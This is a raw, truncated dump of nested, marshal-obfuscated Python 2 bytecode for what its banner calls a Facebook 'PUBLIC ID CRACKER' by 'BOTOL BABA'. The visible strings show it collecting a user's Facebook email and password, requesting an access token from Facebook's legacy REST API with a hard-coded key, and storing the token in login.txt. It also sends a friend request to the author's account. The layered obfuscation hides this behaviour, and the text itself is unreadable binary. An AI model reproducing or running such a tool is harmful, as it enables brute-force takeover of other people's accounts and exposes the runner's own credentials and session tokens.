x00i\xff\xff\xff\xffNsdV\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xceU\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs8U\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xa2T\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x0cT\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsvS\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xe0R\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsJR\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xb4Q\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x1eQ\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x88P\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xf2O\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\\O\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xc6N\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs0N\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x9aM\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x04M\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsnL\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xd8K\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsBK\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xacJ\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x16J\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x80I\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xeaH\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsTH\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xbeG\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs(G\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x9c\x02\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x03\x00Z\x03\x00d\x00\x00d\x01\x00l\x04\x00Z\x04\x00d\x00\x00d\x01\x00l\x05\x00Z\x05\x00d\x00\x00d\x01\x00l\x06\x00Z\x06\x00d\x00\x00d\x01\x00l\x07\x00Z\x07\x00d\x00\x00d\x01\x00l\x08\x00Z\x08\x00d\x00\x00d\x01\x00l\t\x00Z\t\x00d\x00\x00d\x01\x00l\n\x00Z\n\x00d\x00\x00d\x01\x00l\x0b\x00Z\x0b\x00d\x00\x00d\x01\x00l\x0c\x00Z\x0c\x00d\x00\x00d\x02\x00l\r\x00m\x0e\x00Z\x0e\x00\x01d\x00\x00d\x03\x00l\x0f\x00m\x10\x00Z\x10\x00\x01d\x00\x00d\x04\x00l\x0c\x00m\x11\x00Z\x11\x00\x01e\x12\x00e\x01\x00\x83\x01\x00\x01e\x01\x00j\x13\x00d\x05\x00\x83\x01\x00\x01e\x0c\x00j\x11\x00\x83\x00\x00Z\x14\x00e\x14\x00j\x15\x00e\x16\x00\x83\x01\x00\x01e\x14\x00j\x17\x00e\x0c\x00j\x18\x00j\x19\x00\x83\x00\x00d\x06\x00d\x07\x00\x83\x01\x01\x01d0\x00g\x01\x00e\x14\x00_\x1a\x00d\n\x00\x84\x00\x00Z\x1b\x00d\x0b\x00\x84\x00\x00Z\x1c\x00d\x0c\x00\x84\x00\x00Z\x1d\x00d\r\x00\x84\x00\x00Z\x1e\x00d\x0e\x00Z\x1f\x00d\x0f\x00\x84\x00\x00Z \x00d\x10\x00Z!\x00g\x00\x00Z"\x00g\x00\x00a#\x00g\x00\x00a$\x00g\x00\x00Z%\x00g\x00\x00Z&\x00d\x11\x00Z\'\x00d\x12\x00Z(\x00e\x00\x00j)\x00d\x13\x00\x83\x01\x00\x01d\x14\x00GHe\x1e\x00d\x15\x00\x83\x01\x00\x01e\x1e\x00d\x16\x00\x83\x01\x00\x01e\x1e\x00d\x17\x00\x83\x01\x00\x01e\x1e\x00d\x18\x00\x83\x01\x00\x01e\x1e\x00d\x19\x00\x83\x01\x00\x01e\x1e\x00d\x1a\x00\x83\x01\x00\x01e\x1e\x00d\x1b\x00\x83\x01\x00\x01d\x1c\x00GHd\x1d\x00GHd\x1e\x00GHd\x1f\x00GHd \x00GHd!\x00GHd"\x00GHd#\x00GHd$\x00GHe\x1e\x00d%\x00\x83\x01\x00\x01d&\x00GHe\x02\x00j*\x00d\x07\x00\x83\x01\x00\x01e\x00\x00j)\x00d\'\x00\x83\x01\x00\x01e\x02\x00j*\x00d\x07\x00\x83\x01\x00\x01e+\x00d(\x00\x83\x01\x00\x01d)\x00\x84\x00\x00Z,\x00d*\x00\x84\x00\x00Z-\x00d+\x00\x84\x00\x00Z.\x00d,\x00\x84\x00\x00Z/\x00d-\x00\x84\x00\x00Z0\x00d.\x00\x84\x00\x00Z1\x00e2\x00d/\x00k\x02\x00r\x98\x02e,\x00\x83\x00\x00\x01n\x00\x00d\x01\x00S(1\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\n\x00\x00\x00ThreadPool(\x01\x00\x00\x00t\x0f\x00\x00\x00ConnectionError(\x01\x00\x00\x00t\x07\x00\x00\x00Browsert\x04\x00\x00\x00utf8t\x08\x00\x00\x00max_timei\x01\x00\x00\x00s\n\x00\x00\x00User-AgentsR\x00\x00\x00Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00C\x00\x00\x00s\x16\x00\x00\x00d\x01\x00GHt\x00\x00j\x01\x00j\x02\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\x0b\x00\x00\x00\x1b[1;91mExit(\x03\x00\x00\x00t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x06\x00\x00\x00keluar\x18\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x05\x01c\x01\x00\x00\x00\x04\x00\x00\x00\x08\x00\x00\x00C\x00\x00\x00sS\x00\x00\x00d\x01\x00}\x01\x00d\x02\x00}\x02\x00x:\x00t\x00\x00D]2\x00}\x03\x00|\x02\x00d\x03\x00|\x01\x00t\x01\x00j\x02\x00d\x04\x00t\x03\x00|\x01\x00\x83\x01\x00d\x05\x00\x18\x83\x02\x00\x19\x17|\x03\x00\x177}\x02\x00q\x13\x00Wt\x04\x00|\x02\x00\x83\x01\x00S(\x06\x00\x00\x00Nt\x07\x00\x00\x00ahtdzjct\x00\x00\x00\x00t\x01\x00\x00\x00!i\x00\x00\x00\x00i\x01\x00\x00\x00(\x05\x00\x00\x00t\x01\x00\x00\x00xt\x06\x00\x00\x00randomt\x07\x00\x00\x00randintt\x03\x00\x00\x00lent\x05\x00\x00\x00cetak(\x04\x00\x00\x00t\x01\x00\x00\x00bt\x01\x00\x00\x00wt\x01\x00\x00\x00dt\x01\x00\x00\x00i(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x04\x00\x00\x00acak\x1d\x00\x00\x00s\n\x00\x00\x00\x00\x01\x06\x01\x06\x01\r\x010\x01c\x01\x00\x00\x00\x05\x00\x00\x00\x07\x00\x00\x00C\x00\x00\x00s~\x00\x00\x00d\x01\x00}\x01\x00xA\x00|\x01\x00D]9\x00}\x02\x00|\x01\x00j\x00\x00|\x02\x00\x83\x01\x00}\x03\x00|\x04\x00j\x01\x00d\x02\x00|\x02\x00\x16d\x03\x00t\x02\x00d\x04\x00|\x03\x00\x17\x83\x01\x00\x16\x83\x02\x00}\x04\x00q\r\x00W|\x04\x00d\x05\x007}\x04\x00|\x04\x00j\x01\x00d\x06\x00d\x05\x00\x83\x02\x00}\x04\x00t\x03\x00j\x04\x00j\x05\x00|\x04\x00d\x07\x00\x17\x83\x01\x00\x01d\x00\x00S(\x08\x00\x00\x00NR\t\x00\x00\x00s\x03\x00\x00\x00!%ss\x07\x00\x00\x00\x1b[%s;1mi\x1f\x00\x00\x00s\x04\x00\x00\x00\x1b[0ms\x02\x00\x00\x00!0s\x01\x00\x00\x00\n(\x06\x00\x00\x00t\x05\x00\x00\x00indext\x07\x00\x00\x00replacet\x03\x00\x00\x00strR\x06\x00\x00\x00t\x06\x00\x00\x00stdoutt\x05\x00\x00\x00write(\x05\x00\x00\x00R\x11\x00\x00\x00R\x12\x00\x00\x00R\x14\x00\x00\x00t\x01\x00\x00\x00jR\x0c\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>R\x10\x00\x00\x00%\x00\x00\x00s\x0e\x00\x00\x00\x00\x01\x06\x01\r\x01\x0f\x01(\x01\n\x01\x12\x01c\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sC\x00\x00\x00x<\x00|\x00\x00d\x01\x00\x17D]0\x00}\x01\x00t\x00\x00j\x01\x00j\x02\x00|\x01\x00\x83\x01\x00\x01t\x00\x00j\x01\x00j\x03\x00\x83\x00\x00\x01t\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01q\x0b\x00Wd\x00\x00S(\x03\x00\x00\x00Ns\x01\x00\x00\x00\ng{\x14\xaeG\xe1z\x84?(\x06\x00\x00\x00R\x06\x00\x00\x00R\x19\x00\x00\x00R\x1a\x00\x00\x00t\x05\x00\x00\x00flusht\x04\x00\x00\x00timet\x05\x00\x00\x00sleep(\x02\x00\x00\x00t\x01\x00\x00\x00zt\x01\x00\x00\x00e(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x05\x00\x00\x00jalan/\x00\x00\x00s\x08\x00\x00\x00\x00\x01\x11\x01\x10\x01\r\x01s\xf1\x01\x00\x00\n\x1b[1;91m \xe2\x99\xa6\xe2\x99\xa6\xe2\x99\xa6\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\x1b[1;96m\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\x1b[1;94m\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\x1b[1;93m\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x99\xa6\xe2\x99\xa6\xe2\x99\xa6\n\x1b[1;91m,-. ,-. ;-. ,--. ,--. ,-. \n\x1b[1;92m| ) ( ` | ) | | | \\ \n\x1b[1;91m|-< `-. |-\' |- |- | | \n\x1b[1;92m| ) . ) | | | | / \n\x1b[1;91m`-\' `-\' \' `--\' `--\' `-\' \x1b[1;95m BOTOLBABA\n\xe2\x99\xa6\xe2\x99\xa6\xe2\x99\xa6\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\x1b[1;93m\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\x1b[1;94m\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\x1b[1;96m\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x99\xa6\xe2\x99\xa6\xe2\x99\xa6\nc\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sF\x00\x00\x00d\x01\x00d\x02\x00d\x03\x00g\x03\x00}\x00\x00x0\x00|\x00\x00D](\x00}\x01\x00d\x04\x00|\x01\x00\x17Gt\x00\x00j\x01\x00j\x02\x00\x83\x00\x00\x01t\x03\x00j\x04\x00d\x05\x00\x83\x01\x00\x01q\x16\x00Wd\x00\x00S(\x06\x00\x00\x00Ns\x04\x00\x00\x00. s\x04\x00\x00\x00.. s\x04\x00\x00\x00... s\x1b\x00\x00\x00\r\x1b[1;93mPlease Wait \x1b[1;93mi\x01\x00\x00\x00(\x05\x00\x00\x00R\x06\x00\x00\x00R\x19\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00(\x02\x00\x00\x00t\x05\x00\x00\x00titikt\x01\x00\x00\x00o(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x03\x00\x00\x00tik@\x00\x00\x00s\n\x00\x00\x00\x00\x01\x0f\x01\r\x01\x08\x00\r\x00i\x00\x00\x00\x00s\r\x00\x00\x00\x1b[31mNot Vulns\t\x00\x00\x00\x1b[32mVulnt\x05\x00\x00\x00cleart\x01\x00\x00\x00 s\x08\x00\x00\x00\x1b[1;93m s&\x00\x00\x00\x1b[1;91m,-. ,-. ;-. ,--. ,--. ,-. s&\x00\x00\x00\x1b[1;92m| ) ( ` | ) | | | \\ s&\x00\x00\x00\x1b[1;91m|-< `-. |-\' |- |- | | s&\x00\x00\x00\x1b[1;92m| ) . ) | | | | / s(\x00\x00\x00\x1b[1;91m`-\' `-\' \' `--\' `--\' `-\' s\x08\x00\x00\x00\x1b[1;96m s5\x00\x00\x00\x1b[1;90m PUBLIC ID CRACKER BY \x1b[1;96mBOTOL BABAs9\x00\x00\x00\x1b[1;97m--------------------------------------------------s\x07\x00\x00\x00\x1b[1;95ms!\x00\x00\x00 AUTHOR : MEHEDI HASAN ARIYANs$\x00\x00\x00 FACEBOOK : FACEBOOK.COM/THEMEHTANs&\x00\x00\x00 YOUTUBE : YOUTUBE.COM/MASTERTRICK1s$\x00\x00\x00 GITHUB : GITHUB.COM/BOTOLMEHEDIs\x07\x00\x00\x00\x1b[1;32ms2\x00\x00\x00--------------------------------------------------s\x07\x00\x00\x00\x1b[1;97ms2\x00\x00\x00\n\x1b[1;96mFIRST OF ALL SUBSCRIBE OUR YOUTUBE CHANNELs-\x00\x00\x00xdg-open https://www.Youtube.com/mastertrick1s\'\x00\x00\x00\n\x1b[1;96mPRESS ENTER TO OPEN MAIN MENU..c\x00\x00\x00\x00\x0b\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xc2\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x1a\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00}\x00\x00t\x03\x00\x83\x00\x00\x01Wn\x94\x02\x04t\x04\x00t\x05\x00f\x02\x00k\n\x00r\xbd\x02\x01\x01\x01t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x06\x00GHd\x04\x00d\x05\x00\x14GHd\x06\x00GHt\x07\x00d\x07\x00\x83\x01\x00}\x01\x00t\x07\x00d\x08\x00\x83\x01\x00}\x02\x00t\x08\x00\x83\x00\x00\x01y\x11\x00t\t\x00j\x02\x00d\t\x00\x83\x01\x00\x01Wn \x00\x04t\n\x00j\x0b\x00k\n\x00r\xaf\x00\x01\x01\x01d\n\x00GHt\x0c\x00\x83\x00\x00\x01n\x01\x00Xt\r\x00t\t\x00j\x0e\x00_\x0f\x00t\t\x00j\x10\x00d\x0b\x00d\x0c\x00\x83\x00\x01\x01|\x01\x00t\t\x00j\x11\x00d\r\x00<|\x02\x00t\t\x00j\x11\x00d\x0e\x00<t\t\x00j\x12\x00\x83\x00\x00\x01t\t\x00j\x13\x00\x83\x00\x00}\x03\x00d\x0f\x00|\x03\x00k\x06\x00r_\x02y.\x01d\x10\x00|\x01\x00\x17d\x11\x00\x17|\x02\x00\x17d\x12\x00\x17}\x04\x00i\x0b\x00d\x13\x00d\x14\x006d\x15\x00d\x16\x006|\x01\x00d\r\x006d\x17\x00d\x18\x006d\x19\x00d\x1a\x006d\x19\x00d\x1b\x006d\x1c\x00d\x1d\x006d\x1e\x00d\x1f\x006|\x02\x00d\x15\x006d \x00d!\x006d"\x00d#\x006}\x05\x00t\x14\x00j\x15\x00d$\x00\x83\x01\x00}\x06\x00|\x06\x00j\x16\x00|\x04\x00\x83\x01\x00\x01|\x06\x00j\x17\x00\x83\x00\x00}\x07\x00|\x05\x00j\x16\x00i\x01\x00|\x07\x00d%\x006\x83\x01\x00\x01d&\x00}\x03\x00t\x18\x00j\x19\x00|\x03\x00d\'\x00|\x05\x00\x83\x01\x01}\x08\x00t\x1a\x00j\x1b\x00|\x08\x00j\x1c\x00\x83\x01\x00}\t\x00t\x02\x00d\x02\x00d(\x00\x83\x02\x00}\n\x00|\n\x00j\x1d\x00|\t\x00d)\x00\x19\x83\x01\x00\x01|\n\x00j\x1e\x00\x83\x00\x00\x01d*\x00GHt\x00\x00j\x01\x00d+\x00\x83\x01\x00\x01t\x18\x00j\x1f\x00d,\x00|\t\x00d)\x00\x19\x17\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01Wq_\x02\x04t\x18\x00j \x00j!\x00k\n\x00r[\x02\x01\x01\x01d-\x00GHt\x0c\x00\x83\x00\x00\x01q_\x02Xn\x00\x00d.\x00|\x03\x00k\x06\x00r\x94\x02d/\x00GHt\x00\x00j\x01\x00d0\x00\x83\x01\x00\x01t"\x00j#\x00d1\x00\x83\x01\x00\x01t\x0c\x00\x83\x00\x00\x01q\xbe\x02d2\x00GHt\x00\x00j\x01\x00d0\x00\x83\x01\x00\x01t"\x00j#\x00d1\x00\x83\x01\x00\x01t$\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(3\x00\x00\x00NR%\x00\x00\x00s\t\x00\x00\x00login.txtt\x01\x00\x00\x00ri2\x00\x00\x00s\n\x00\x00\x00\x1b[1;96m\xe2\x96\xaasB\x00\x00\x00 \x1b[1;97m[\xe2\x97\x89] \x1b[1;96mLogin New Fresh Account \x1b[1;97m[\xe2\x97\x89]s7\x00\x00\x00 \x1b[1;97m[\xe2\x97\x89] \x1b[1;97mID/Email \x1b[1;91m: \x1b[1;92ms7\x00\x00\x00 \x1b[1;97m[\xe2\x97\x89] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92ms\x16\x00\x00\x00https://m.facebook.coms2\x00\x00\x00\n\x1b[1;96m[!] \x1b[1;91mThere is no internet connectiont\x02\x00\x00\x00nri\x00\x00\x00\x00t\x05\x00\x00\x00emailt\x04\x00\x00\x00passs\x0b\x00\x00\x00save-devicesG\x00\x00\x00api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=s`\x00\x00\x00format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=s;\x00\x00\x00return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32t \x00\x00\x00882a8490361da98702bf97a021ddc14dt\x07\x00\x00\x00api_keyt\x08\x00\x00\x00passwordt\x10\x00\x00\x00credentials_typet\x04\x00\x00\x00JSONt\x06\x00\x00\x00formatt\x01\x00\x00\x001t\x13\x00\x00\x00generate_machine_idt\x18\x00\x00\x00generate_session_cookiest\x05\x00\x00\x00en_USt\x06\x00\x00\x00locales\n\x00\x00\x00auth.logint\x06\x00\x00\x00methodt\x01\x00\x00\x000t\x14\x00\x00\x00return_ssl_resourcess\x03\x00\x00\x001.0t\x01\x00\x00\x00vt\x03\x00\x00\x00md5t\x03\x00\x00\x00sigs\'\x00\x00\x00https://api.facebook.com/restserver.phpt\x06\x00\x00\x00paramsR\x12\x00\x00\x00t\x0c\x00\x00\x00access_tokens$\x00\x00\x00\n\x1b[1;36;40m[\xe2\x9c\x93] Login Successful...s.\x00\x00\x00xdg-open http://www.www.facebook.com/TheMehtansM\x00\x00\x00https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=s+\x00\x00\x00\n\x1b[1;97m[!] There is no internet connectiont\n\x00\x00\x00checkpoints)\x00\x00\x00\n\x1b[1;97m[!] Your Account is on Checkpoints\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s\x1f\x00\x00\x00\n\x1b[1;97mPassword/Email is wrong(%\x00\x00\x00R\x05\x00\x00\x00t\x06\x00\x00\x00systemt\x04\x00\x00\x00opent\x04\x00\x00\x00menut\x08\x00\x00\x00KeyErrort\x07\x00\x00\x00IOErrort\x04\x00\x00\x00logot\t\x00\x00\x00raw_inputR$\x00\x00\x00t\x02\x00\x00\x00brt\t\x00\x00\x00mechanizet\x08\x00\x00\x00URLErrorR\x08\x00\x00\x00t\x04\x00\x00\x00Truet\x08\x00\x00\x00_factoryt\x07\x00\x00\x00is_htmlt\x0b\x00\x00\x00select_formt\x04\x00\x00\x00formt\x06\x00\x00\x00submitt\x06\x00\x00\x00geturlt\x07\x00\x00\x00hashlibt\x03\x00\x00\x00newt\x06\x00\x00\x00updatet\t\x00\x00\x00hexdigestt\x08\x00\x00\x00requestst\x03\x00\x00\x00gett\x04\x00\x00\x00jsont\x05\x00\x00\x00loadst\x04\x00\x00\x00textR\x1a\x00\x00\x00t\x05\x00\x00\x00closet\x04\x00\x00\x00postt\n\x00\x00\x00exceptionsR\x01\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00t\x05\x00\x00\x00login(\x0b\x00\x00\x00t\x05\x00\x00\x00tokett\x02\x00\x00\x00idt\x03\x00\x00\x00pwdt\x03\x00\x00\x00urlR;\x00\x00\x00t\x04\x00\x00\x00dataR\x0c\x00\x00\x00t\x01\x00\x00\x00aR\'\x00\x00\x00R\x1f\x00\x00\x00t\x07\x00\x00\x00unikers(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>R\\\x00\x00\x00k\x00\x00\x00sj\x00\x00\x00\x00\x01\r\x01\x03\x01\x0f\x01\x0b\x01\x13\x01\r\x01\x05\x01\t\x03\x05\x01\x0c\x01\x0c\x01\x07\x01\x03\x01\x11\x01\x10\x01\x05\x01\x0b\x01\x0c\x01\x10\x01\r\x01\r\x01\n\x01\x0c\x01\x0c\x01\x03\x02\x16\x01S\x01\x0f\x01\r\x01\x0c\x01\x14\x01\x06\x01\x15\x01\x12\x01\x0f\x01\x11\x01\n\x01\x05\x01\r\x01\